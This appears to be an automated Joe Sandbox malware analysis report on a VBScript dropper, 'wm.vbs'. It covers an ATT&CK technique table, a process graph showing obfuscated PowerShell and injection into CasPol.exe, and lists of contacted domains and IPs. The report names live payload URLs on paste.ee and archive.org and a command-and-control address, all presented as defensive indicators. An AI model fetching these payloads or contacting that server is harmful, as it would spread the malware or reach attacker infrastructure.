                Deobfuscate/Decode Files or Information                		LSASS Memory13
                System Information Discovery                		Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts11
                Command and Scripting Interpreter                		Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information                		Security Account Manager121
                Security Software Discovery                		SMB/Windows Admin SharesData from Network Shared Drive11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts3
                PowerShell                		Login HookLogin Hook1
                Software Packing                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput Capture1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets141
                Virtualization/Sandbox Evasion                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input Capture13
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                Virtualization/Sandbox Evasion                		DCSync1
                Remote System Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                Process Injection                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518301 Sample: wm.vbs Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 33 paste.ee 2->33 35 ia600100.us.archive.org 2->35 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 63 12 other signatures 2->63 9 wscript.exe 1 2->9         started        signatures3 61 Connects to a pastebin service (likely for C&C) 33->61 process4 signatures5 65 VBScript performs obfuscated calls to suspicious functions 9->65 67 Suspicious powershell command line found 9->67 69 Wscript starts Powershell (via cmd or directly) 9->69 71 3 other signatures 9->71 12 cmd.exe 1 9->12         started        15 powershell.exe 7 9->15         started        process6 signatures7 73 Wscript starts Powershell (via cmd or directly) 12->73 75 Uses ping.exe to sleep 12->75 77 Uses ping.exe to check the status of other devices and networks 12->77 17 powershell.exe 7 12->17         started        20 PING.EXE 1 12->20         started        23 conhost.exe 12->23         started        79 Suspicious powershell command line found 15->79 81 Obfuscated command line found 15->81 25 powershell.exe 14 16 15->25         started        27 conhost.exe 15->27         started        process8 dnsIp9 45 Suspicious powershell command line found 17->45 47 Obfuscated command line found 17->47 49 Found suspicious powershell code related to unpacking or dynamic code loading 17->49 37 127.0.0.1 unknown unknown 20->37 39 paste.ee 188.114.96.3, 443, 49708 CLOUDFLARENETUS European Union 25->39 41 ia600100.us.archive.org 207.241.227.240, 443, 49707 INTERNET-ARCHIVEUS United States 25->41 51 Writes to foreign memory regions 25->51 53 Injects a PE file into a foreign processes 25->53 29 CasPol.exe 4 25->29         started        signatures10 process11 dnsIp12 43 135.224.23.113, 49709, 5555 LUCENT-CIOUS United States 29->43 83 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 29->83 signatures13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                wm.vbs0%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://oneget.orgX0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://oneget.org0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                https://paste.ee0%Avira URL Cloudsafe
                https://www.google.com;0%Avira URL Cloudsafe
                http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                http://paste.ee0%Avira URL Cloudsafe
                https://paste.ee/d/Sk1Jg/0100%Avira URL Cloudmalware
                https://aka.ms/pscore60%Avira URL Cloudsafe
                https://analytics.paste.ee0%Avira URL Cloudsafe
                https://ia600100.us.arX0%Avira URL Cloudsafe
                https://analytics.paste.ee;0%Avira URL Cloudsafe
                https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt100%Avira URL Cloudmalware
                135.224.23.1130%Avira URL Cloudsafe
                http://crl.microsofth0%Avira URL Cloudsafe
                https://ia600100.us.archive.org0%Avira URL Cloudsafe
                https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
                https://www.google.com0%Avira URL Cloudsafe
                https://secure.gravatar.com0%Avira URL Cloudsafe
                https://themes.googleusercontent.com0%Avira URL Cloudsafe
                https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
                http://ia600100.us.archive.org0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ia600100.us.archive.org
                		207.241.227.240
                		truefalse
                  		unknown
                  paste.ee
                  		188.114.96.3
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://paste.ee/d/Sk1Jg/0true
                    • Avira URL Cloud: malware
                    		unknown
                    https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalse
                    • Avira URL Cloud: malware
                    		unknown
                    135.224.23.113true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1675423746.0000016901929000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://paste.eepowershell.exe, 00000009.00000002.1675423746.0000016900408000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://go.micropowershell.exe, 00000009.00000002.1675423746.000001690100E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com;powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ia600100.us.arXpowershell.exe, 00000009.00000002.1675423746.00000169015F0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://analytics.paste.eepowershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://paste.eepowershell.exe, 00000009.00000002.1675423746.0000016900408000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore6powershell.exe, 00000005.00000002.1513504661.000001618001B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.compowershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.microsofthpowershell.exe, 00000009.00000002.1729309445.00000169798D5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1675423746.0000016901929000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://oneget.orgXpowershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://analytics.paste.ee;powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ia600100.us.archive.orgpowershell.exe, 00000009.00000002.1675423746.00000169015F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdnjs.cloudflare.compowershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000005.00000002.1513504661.0000016180069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B00062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900001000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdnjs.cloudflare.com;powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1513504661.000001618009B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900001000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://secure.gravatar.compowershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://themes.googleusercontent.compowershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://oneget.orgpowershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ia600100.us.archive.orgpowershell.exe, 00000009.00000002.1675423746.0000016901679000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    188.114.96.3
                    		paste.eeEuropean Union
                    		13335CLOUDFLARENETUStrue
                    207.241.227.240
                    		ia600100.us.archive.orgUnited States
                    		7941INTERNET-ARCHIVEUSfalse
                    135.224.23.113
                    		unknownUnited States
                    		10455LUCENT-CIOUStrue

                    Private

                    IP
                    127.0.0.1

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1518301
                    Start date and time:2024-09-25 15:25:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 2s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:14
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:wm.vbs
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winVBS@15/8@2/4
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:
                    • Successful, ratio: 93%
                    • Number of executed functions: 11
                    • Number of non-executed functions: 3
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 7348 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7968 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 8152 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: wm.vbs

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    09:26:19API Interceptor54x Sleep call for process: powershell.exe modified
                    09:26:42API Interceptor1204278x Sleep call for process: CasPol.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    188.114.96.3https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                    • hdcy.emcl00.com/qRCfs/
                    PO23100072.exeGet hashmaliciousFormBookBrowse
                    • www.cc101.pro/ttiz/
                    RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                    • www.1win-moldovia.fun/1g7m/
                    TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                    • www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
                    Petronas quotation request.exeGet hashmaliciousFormBookBrowse
                    • www.chinaen.org/zi4g/
                    Shipping Documemt.vbsGet hashmaliciousLokibotBrowse
                    • werdotx.shop/Devil/PWS/fre.php
                    Quotes updates request.exeGet hashmaliciousFormBookBrowse
                    • www.1win-moldovia.fun/1g7m/
                    PO-001.exeGet hashmaliciousFormBookBrowse
                    • www.1win-moldovia.fun/kslt/
                    PO2024033194.exeGet hashmaliciousFormBookBrowse
                    • www.rtpngk.xyz/876i/
                    LOL and profile.exeGet hashmaliciousFormBookBrowse
                    • www.chinaen.org/zi4g/
                    207.241.227.240TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                      BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                        Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                          1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                            AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                              Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                                SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                  US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                    IEnetbookCookies.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                      US091024A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                        135.224.23.1131727269807db8b68b2c9b1c9bdd42030655a5e439e971ba77503b2390bf7da0c0928072d74511.dat-decoded.exeGet hashmaliciousXWormBrowse
                                          TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            paste.eeZoom_Invite.call-660194855683.wsfGet hashmaliciousXWormBrowse
                                            • 188.114.97.3
                                            reported_account_violation-pdf-67223451.wsfGet hashmaliciousXWormBrowse
                                            • 188.114.97.3
                                            New_Document-660128863990.wsfGet hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            New_Document-660119928827.wsfGet hashmaliciousUnknownBrowse
                                            • 188.114.97.3
                                            New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                            • 188.114.97.3
                                            asd.wsfGet hashmaliciousXWormBrowse
                                            • 188.114.97.3
                                            Commitment_for_Title_Insurance-660184790411.wsfGet hashmaliciousXWormBrowse
                                            • 188.114.97.3
                                            Document-660117765723.wsfGet hashmaliciousXWormBrowse
                                            • 188.114.97.3
                                            evidenne_for_suspect_2481u41u824u8124-pdf-660103895361.wsfGet hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            ia600100.us.archive.orgBL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                                            • 207.241.227.240
                                            SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            IEnetbookCookies.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            US091024A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            Label_091273172.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            LUCENT-CIOUS1727269807db8b68b2c9b1c9bdd42030655a5e439e971ba77503b2390bf7da0c0928072d74511.dat-decoded.exeGet hashmaliciousXWormBrowse
                                            • 135.224.23.113
                                            TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                            • 135.224.23.113
                                            SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elfGet hashmaliciousUnknownBrowse
                                            • 135.225.246.112
                                            mdfh8nJQAy.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 135.87.80.52
                                            SecuriteInfo.com.Linux.Siggen.9999.8163.26295.elfGet hashmaliciousMiraiBrowse
                                            • 135.237.36.212
                                            tmNB51skaY.elfGet hashmaliciousMiraiBrowse
                                            • 135.242.130.152
                                            QvTbUiFWlo.elfGet hashmaliciousMiraiBrowse
                                            • 152.148.171.251
                                            SecuriteInfo.com.Linux.Siggen.9999.11579.20419.elfGet hashmaliciousMiraiBrowse
                                            • 135.90.159.82
                                            SecuriteInfo.com.Linux.Siggen.9999.21530.5221.elfGet hashmaliciousMiraiBrowse
                                            • 135.239.42.142
                                            sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 135.89.245.17
                                            INTERNET-ARCHIVEUSTM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                            • 207.241.227.240
                                            BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                                            • 207.241.227.240
                                            SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            IEnetbookCookies.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            US091024A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            CLOUDFLARENETUSTeklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            http://mir-belting.comGet hashmaliciousUnknownBrowse
                                            • 162.159.140.229
                                            https://empshentel.com/share/sharefile/Get hashmaliciousHTMLPhisherBrowse
                                            • 172.67.177.128
                                            https://nvoice0077.s3.ap-southeast-2.amazonaws.com/Viewer.htmlGet hashmaliciousScreenConnect ToolBrowse
                                            • 188.114.97.3
                                            PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                            • 188.114.97.3
                                            ptgl503.exeGet hashmaliciousLummaCBrowse
                                            • 172.67.206.221
                                            https://odo1s.risongeye.com/oTUk/Get hashmaliciousHTMLPhisherBrowse
                                            • 188.114.96.3
                                            Suselx1.exeGet hashmaliciousLummaCBrowse
                                            • 172.67.189.2
                                            https://www.concursolutions.us.com/lstQ3Ewa4RAt2API1AnsoTxu4RAcQ3EpQ3E4RAfoTx4RAmsz01coTxmGet hashmaliciousUnknownBrowse
                                            • 1.1.1.1
                                            gkqg90.ps1Get hashmaliciousLummaCBrowse
                                            • 172.67.189.2

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0eTeklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 207.241.227.240
                                            • 188.114.96.3
                                            http://mir-belting.comGet hashmaliciousUnknownBrowse
                                            • 207.241.227.240
                                            • 188.114.96.3
                                            PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                            • 207.241.227.240
                                            • 188.114.96.3
                                            test.batGet hashmaliciousMicroClipBrowse
                                            • 207.241.227.240
                                            • 188.114.96.3
                                            z38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 207.241.227.240
                                            • 188.114.96.3
                                            rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 207.241.227.240
                                            • 188.114.96.3
                                            rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 207.241.227.240
                                            • 188.114.96.3
                                            9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                                            • 207.241.227.240
                                            • 188.114.96.3
                                            6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                                            • 207.241.227.240
                                            • 188.114.96.3
                                            4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                                            • 207.241.227.240
                                            • 188.114.96.3

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9434
                                            Entropy (8bit):4.928515784730612
                                            Encrypted:false
                                            SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                            MD5:D3594118838EF8580975DDA877E44DEB
                                            SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                            SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                            SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):0.34726597513537405
                                            Encrypted:false
                                            SSDEEP:3:Nlll:Nll
                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                            Malicious:false
                                            Preview:@...e...........................................................

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gs4dr5x.1ht.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdqc2dde.23y.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
